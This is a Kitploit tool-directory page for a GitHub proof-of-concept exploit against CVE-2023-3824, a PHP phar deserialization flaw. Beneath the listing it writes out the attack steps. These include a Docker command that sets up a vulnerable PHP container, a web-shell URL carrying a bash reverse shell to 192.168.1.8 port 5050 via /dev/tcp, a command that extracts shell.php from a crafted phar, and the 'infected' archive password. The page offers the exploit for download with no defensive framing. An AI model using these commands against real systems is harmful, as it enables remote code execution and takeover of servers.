Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2023-3824 — Proof-of-concept exploit for CVE-2023-3824 (PHP phar deserialization) enabling remote code execution via crafted phar archive and reverse shell payload. | Kitploit
Tools/GitHubGitHub/dadosneurais/cve-2023-3824
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationCommand and Control
GitHubdadosneurais/cve-2023-3824

cve-2023-3824

Proof-of-concept exploit for CVE-2023-3824 (PHP phar deserialization) enabling remote code execution via crafted phar archive and reverse shell payload.

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash echo "phar.readonly = Off" >> /usr/local/etc/php/php.ini

http://localhost:8080/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.1.8/5050 0>%261'

php -r "$phar = new Phar('exploit.phar'); $phar->extractTo('./', 'shell.php');"

exploit.zip pass: infected

Download Tool